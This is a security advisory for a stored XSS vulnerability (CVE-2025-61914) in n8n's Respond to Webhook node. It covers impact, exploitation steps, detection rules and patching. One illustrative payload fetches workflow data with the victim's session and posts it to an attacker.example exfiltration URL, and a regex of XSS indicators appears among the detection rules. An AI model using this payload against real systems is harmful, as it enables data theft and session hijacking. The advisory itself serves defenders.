Vulnerability Overview

Vulnerability Description

n8n is an open-source workflow automation platform widely used to integrate services and automate business processes. A stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 1.114.0, specifically related to the “Respond to Webhook” node.

The issue occurs when this node is configured to return HTML responses containing executable JavaScript. Instead of being rendered within the sandboxed iframe introduced in version 1.103.0, the response may execute directly in the top-level browser window. This breaks the intended isolation model.

As a result, a malicious user with permission to create or modify workflows can inject JavaScript that executes in the context of the n8n editor interface. Because this is a stored XSS, the payload persists and can trigger whenever the affected workflow is accessed or executed.

Impact

Successful exploitation may allow an attacker to:

• Execute arbitrary JavaScript in the n8n editor UI
• Steal active session cookies or authentication tokens
• Perform actions on behalf of other users (including administrators)
• Modify or delete workflows without authorization
• Access sensitive workflow data, credentials, or environment variables
• Pivot to further attacks within the automation environment

While the vulnerability requires authenticated access, the impact is elevated due to cross-context execution and persistence.

How This Vulnerability Could Be Exploited

A realistic exploitation path could look like this:

1. An attacker gains workflow creation or edit permissions (legitimate user, compromised account, or insider).
2. They configure a Respond to Webhook node to return malicious HTML containing embedded JavaScript.
3. The workflow is saved and executed or triggered via webhook.
4. The response renders in the top-level n8n editor window, not the sandbox.
5. The malicious script executes with the same privileges as the n8n UI session.

Payload (Illustrative)

<script>
fetch('/rest/workflows', { credentials: 'include' })
  .then(r => r.text())
  .then(data => fetch('https://attacker.example/exfil', {
    method: 'POST',
    body: data
  }));
</script>

This type of payload could silently extract sensitive workflow data or hijack user sessions.

MITRE ATT&CK Mapping

Proof of Concept (PoC) Status

Current Status: No publicly available proof-of-concept code.

• The issue has not been widely weaponized at the time of disclosure.
• No exploit code has been observed in public repositories or exploit databases.
• Given the simplicity of XSS payloads and the popularity of n8n, public PoCs are likely to emerge.
• Organizations should assume this vulnerability is easily reproducible by any user with workflow permissions.

Detection and Monitoring Guidance

What to Look For

Security teams should monitor for the following indicators:

• Workflows returning HTML responses from the Respond to Webhook node
• Inline <script> tags or JavaScript event handlers in webhook responses
• Unexpected outbound requests from the n8n UI to external domains
• Unusual workflow modifications by non-administrative users
• User sessions performing actions without corresponding UI activity

Sample Detection Payloads

Suspicious HTML Indicators

<script>|onerror=|onload=|javascript:|document\.cookie|window\.top

Sample Detection Rules

SIEM / Log-Based Rule (Generic)

IF webhook_response_content CONTAINS "<script"
AND node_type = "Respond to Webhook"
THEN alert severity = High

Reverse Proxy / WAF Rule

Block responses where Content-Type = text/html
AND response body contains executable JavaScript
AND source = n8n webhook endpoint

Relevant Log Sources

To detect exploitation attempts, collect and analyze:

• n8n application logs (workflow execution and node output logs)
• Audit logs for workflow creation and modification
• Web server / reverse proxy logs in front of n8n
• Browser security logs (CSP violations, if enabled)
• Network egress logs for unexpected outbound connections
• Authentication and session logs for anomalous user behavior

Remediation and Mitigation

Official Patch (Recommended)

• Upgrade to n8n version 1.114.0 or later
• This version fully enforces sandboxing for webhook responses and prevents script execution in the top-level UI context.
• Official Release / Patch Link:
  https://github.com/n8n-io/n8n/releases/tag/n8n%401.114.0

Temporary Mitigations

If immediate patching is not possible:

1. Restrict workflow creation and modification to trusted users only
2. Avoid returning HTML content from the Respond to Webhook node
3. Enforce Content-Type: application/json wherever possible
4. Deploy a reverse proxy or HTML sanitizer to strip executable scripts
5. Review existing workflows for unsafe HTML responses

Summary

CVE-2025-61914 is a high-impact stored XSS vulnerability in n8n that breaks sandbox isolation and allows arbitrary JavaScript execution in the editor interface. While exploitation requires workflow permissions, the persistence and cross-context execution significantly raise the risk.

Organizations using n8n should upgrade immediately to version 1.114.0, audit existing workflows, and restrict workflow permissions to trusted users. Left unpatched, this issue could enable session hijacking, data exposure, and full workflow compromise.